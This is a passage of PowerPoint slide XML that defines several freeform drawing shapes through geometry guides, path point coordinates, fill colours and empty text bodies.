                <a:lnTo>
                  <a:pt x="113" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="68"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10337" name="Freeform 418"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1531937" y="7156450"/>
            <a:ext cx="217488" cy="73025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 96"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 96"/>
              <a:gd name="T3" fmla="*/ 0 h 32"/>
              <a:gd name="T4" fmla="*/ 0 w 96"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 96"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 96"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 96"/>
              <a:gd name="T16" fmla="*/ 0 h 32"/>
              <a:gd name="T17" fmla="*/ 96 w 96"/>
              <a:gd name="T18" fmla="*/ 32 h 32"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="96" h="32">
                <a:moveTo>
                  <a:pt x="96" y="12"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="12"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10338" name="Freeform 419"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1638300" y="7181850"/>
            <a:ext cx="95250" cy="31750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T3" fmla="*/ 0 h 14"/>
              <a:gd name="T4" fmla="*/ 0 w 42"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 42"/>
              <a:gd name="T16" fmla="*/ 0 h 14"/>
              <a:gd name="T17" fmla="*/ 42 w 42"/>
              <a:gd name="T18" fmla="*/ 14 h 14"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="42" h="14">
                <a:moveTo>
                  <a:pt x="42" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="6"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10339" name="Freeform 420"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1543050" y="7165975"/>
            <a:ext cx="63500" cy="22225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 28"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T2" fmla="*/ 0 w 28"/>
              <a:gd name="T3" fmla="*/ 0 h 10"/>
              <a:gd name="T4" fmla="*/ 0 w 28"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 28"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 28"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 28"/>
              <a:gd name="T16" fmla="*/ 0 h 10"/>
              <a:gd name="T17" fmla="*/ 28 w 28"/>
              <a:gd name="T18" fmla="*/ 10 h 10"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="28" h="10">
                <a:moveTo>
                  <a:pt x="28" y="4"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10340" name="Freeform 421"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1389062" y="7186613"/>
            <a:ext cx="366713" cy="123825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 162"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T2" fmla="*/ 0 w 162"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T33" fmla="*/ 0 h 55"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T68" fmla="*/ 0 w 162"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 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2"/>
              <a:gd name="T106" fmla="*/ 0 h 55"/>
              <a:gd name="T107" fmla="*/ 162 w 162"/>
              <a:gd name="T108" fmla="*/ 55 h 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2" h="55">
                <a:moveTo>
                  <a:pt x="0" y="16"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10341" name="Freeform 422"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1755775" y="7172325"/>
            <a:ext cx="128587" cy="58738"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 57"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 57"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 57"/>
              <a:gd name="T5" fmla="*/ 0 h 26"/>
              <a:gd name="T6" fmla="*/ 0 w 57"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T8" fmla="*/ 0 w 57"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 57"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 60000 65536"/>
              <a:gd name="T16" fmla="*/ 0 60000 65536"/>
              <a:gd name="T17" fmla="*/ 0 60000 65536"/>
              <a:gd name="T18" fmla="*/ 0 w 57"/>
              <a:gd name="T19" fmla="*/ 0 h 26"/>
              <a:gd name="T20" fmla="*/ 57 w 5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7" h="26">
                <a:moveTo>
                  <a:pt x="6" y="26"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="57" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="001999"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10342" name="Freeform 423"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1414462" y="6924675"/>
            <a:ext cx="73025" cy="277813"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T15" fmla="*/ 0 h 123"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T17" fmla="*/ 0 h 123"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T19" fmla="*/ 0 h 123"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T21" fmla="*/ 0 h 123"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T23" fmla="*/ 0 h 123"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T25" fmla="*/ 0 h 123"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T32" fmla="*/ 0 w 32"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T34" fmla="*/ 0 w 32"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 123"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 32"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 12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
              <a:gd name="T106" fmla="*/ 0 h 123"/>
              <a:gd name="T107" fmla="*/ 32 w 32"/>
              <a:gd name="T108" fmla="*/ 123 h 12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 h="123">
                <a:moveTo>
                  <a:pt x="32" y="3"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="3"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="7FBFBF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
